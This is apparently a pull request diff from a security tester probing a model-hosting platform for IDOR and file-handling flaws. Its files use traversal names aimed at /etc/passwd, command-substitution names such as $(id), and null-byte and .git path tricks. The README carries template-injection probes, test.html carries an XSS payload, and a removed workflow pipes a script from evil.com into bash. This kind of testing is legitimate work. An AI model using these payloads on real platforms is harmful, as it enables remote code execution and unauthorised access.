PR IDOR test from Account2

#11

by SECONDACCOUNT69 - opened 13 days ago

base: refs/heads/main

←

from: refs/pr/11

Discussion Files changed

+57

-72

This view is limited to 50 files because it contains too many changes. See the raw diff here.

Files changed (50) hide show

.git/config +0 -1
$(id).txt +0 -1
%252e%252e%252fetc%252fpasswd +0 -1
%2e%2e/%2e%2e/etc/passwd +0 -1
.env +0 -1
.git/tconfig +0 -1
.git//vconfig +0 -1
.git%00/config +0 -1
.gitattributes +34 -0
.github/workflows/evil.yml +0 -7
.gitmodules +0 -3
.git~1/config +0 -1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt +0 -1
README.md +19 -2
__pycache__/exploit.py +0 -1
`id`.txt +0 -1
a.txt +0 -1
a/b.txt +0 -1
a/c.txt +0 -1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt +0 -1
bar.txt +0 -1
c.txt +0 -1
clean_redir.txt +0 -1
con.txt +0 -1
file/nname.txt +0 -1
file%00name.txt +0 -1
file%2500.txt +0 -1
lfs-pointer-test.bin +0 -3
lfs-test-proper.bin +0 -3
link.txt +0 -1
method_test.txt +0 -1
method_test2.txt +0 -1
node_modules/.cache/hack +0 -1
normal.txt::$DATA +0 -1
null-byte-test-cleanup.txt +0 -1
nullbyte.txt +0 -1
port_test.txt +0 -1
pr-branch-push.txt +1 -0
pr-idor-test.txt +1 -0
pr-test.txt +0 -1
public-test.txt +0 -1
redirect_chain_test.txt +0 -1
redirect_test.txt +0 -1
redirect_test2.txt +0 -1
search-test.md +0 -7
symlink-test +0 -1
test.html +1 -1
test.svg +1 -0
test|id.txt +0 -1
webhook-trigger.txt +0 -1

.git/config DELETED Viewed

	@@ -1 +0,0 @@
1	- test for leading space

$(id).txt DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

%252e%252e%252fetc%252fpasswd DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

%2e%2e/%2e%2e/etc/passwd DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

.env DELETED Viewed

	@@ -1 +0,0 @@
1	- test content

.git/tconfig DELETED Viewed

	@@ -1 +0,0 @@
1	- test for tab in git path

.git//vconfig DELETED Viewed

	@@ -1 +0,0 @@
1	- test for vtab in git path

.git%00/config DELETED Viewed

	@@ -1 +0,0 @@
1	- test for pct-null in git path

.gitattributes CHANGED Viewed

	@@ -1 +1,35 @@
























1	*.safetensors filter=lfs diff=lfs merge=lfs -text

+*.7z filter=lfs diff=lfs merge=lfs -text
+*.arrow filter=lfs diff=lfs merge=lfs -text
+*.bin filter=lfs diff=lfs merge=lfs -text
+*.bz2 filter=lfs diff=lfs merge=lfs -text
+*.ckpt filter=lfs diff=lfs merge=lfs -text
+*.ftz filter=lfs diff=lfs merge=lfs -text
+*.gz filter=lfs diff=lfs merge=lfs -text
+*.h5 filter=lfs diff=lfs merge=lfs -text
+*.joblib filter=lfs diff=lfs merge=lfs -text
+*.lfs.* filter=lfs diff=lfs merge=lfs -text
+*.mlmodel filter=lfs diff=lfs merge=lfs -text
+*.model filter=lfs diff=lfs merge=lfs -text
+*.msgpack filter=lfs diff=lfs merge=lfs -text
+*.npy filter=lfs diff=lfs merge=lfs -text
+*.npz filter=lfs diff=lfs merge=lfs -text
+*.onnx filter=lfs diff=lfs merge=lfs -text
+*.ot filter=lfs diff=lfs merge=lfs -text
+*.parquet filter=lfs diff=lfs merge=lfs -text
+*.pb filter=lfs diff=lfs merge=lfs -text
+*.pickle filter=lfs diff=lfs merge=lfs -text
+*.pkl filter=lfs diff=lfs merge=lfs -text
+*.pt filter=lfs diff=lfs merge=lfs -text
+*.pth filter=lfs diff=lfs merge=lfs -text
+*.rar filter=lfs diff=lfs merge=lfs -text
 *.safetensors filter=lfs diff=lfs merge=lfs -text
+saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+*.tar.* filter=lfs diff=lfs merge=lfs -text
+*.tar filter=lfs diff=lfs merge=lfs -text
+*.tflite filter=lfs diff=lfs merge=lfs -text
+*.tgz filter=lfs diff=lfs merge=lfs -text
+*.wasm filter=lfs diff=lfs merge=lfs -text
+*.xz filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text
+*.zst filter=lfs diff=lfs merge=lfs -text
+*tfevents* filter=lfs diff=lfs merge=lfs -text

.github/workflows/evil.yml DELETED Viewed

@@ -1,7 +0,0 @@
-inline:0:name: evil
-on: push
-jobs:
-  evil:
-    runs-on: ubuntu-latest
-    steps:
-    - run: curl http://evil.com/shell.sh | bash

.gitmodules DELETED Viewed

@@ -1,3 +0,0 @@
-[submodule "evil"]
-	path = .git
-	url = https://example.com/evil.git

.git~1/config DELETED Viewed

	@@ -1 +0,0 @@
1	- shortname test

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

README.md CHANGED Viewed

@@ -1,5 +1,22 @@
 ---
 license: mit
 ---
-# test-hunt-2
-Test model for security research.

 ---
 license: mit
 ---
+# SSTI Test
+{@html "<b>bold</b>"}
+{2+2}
+{process.env}
+${7*7}
+{{7*7}}
+<%= 7*7 %>
+#{7*7}
+${{7*7}}
+{#if true}visible{/if}

__pycache__/exploit.py DELETED Viewed

	@@ -1 +0,0 @@
1	- test content

`id`.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

a.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test for 3x up from 3 deep = root level

a/b.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test for many slashes

a/c.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- within_test

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test

bar.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- normalized_test

c.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- normalized_test2

clean_redir.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778466942

con.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test

file/nname.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test

file%00name.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test

file%2500.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

lfs-pointer-test.bin DELETED Viewed

@@ -1,3 +0,0 @@
-inline:0:version https://git-lfs.github.com/spec/v1
-oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
-size 12345

lfs-test-proper.bin DELETED Viewed

@@ -1,3 +0,0 @@
-inline:0:version https://git-lfs.github.com/spec/v1
-oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
-size 12345

link.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- ../../../etc/passwd

method_test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778466738

method_test2.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778467055

node_modules/.cache/hack DELETED Viewed

	@@ -1 +0,0 @@
1	- test content

normal.txt::$DATA DELETED Viewed

	@@ -1 +0,0 @@
1	- ads test

null-byte-test-cleanup.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test content

nullbyte.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- null test

port_test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778467241

pr-branch-push.txt ADDED Viewed

	@@ -0,0 +1 @@


1	+ pushed to PR branch

pr-idor-test.txt ADDED Viewed

	@@ -0,0 +1 @@


1	+ This PR was created by Account2 on Account1 repo

pr-test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- pr test content

public-test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- Public trigger

redirect_chain_test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778466487

redirect_test.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- redirect test 1778465976

redirect_test2.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- test 1778466302

search-test.md DELETED Viewed

@@ -1,7 +0,0 @@
----
-tags:
-- PUBLICSEARCHTOKEN99887766
----
-# Public Test Model
-This model contains PUBLICSEARCHTOKEN99887766 unique identifier for search testing.

symlink-test DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:/etc/passwd

test.html CHANGED Viewed

	@@ -1 +1 @@
1	- <html><~~head><title>Test</title></head><~~body><~~h1>XSS Test</h1><~~script>document.~~title="safe"~~</script></body></html>


1	+ <html><body><script>document.write(document.domain)</script></body></html>

test.svg ADDED Viewed

test|id.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- inline:0:test

webhook-trigger.txt DELETED Viewed

	@@ -1 +0,0 @@
1	- trigger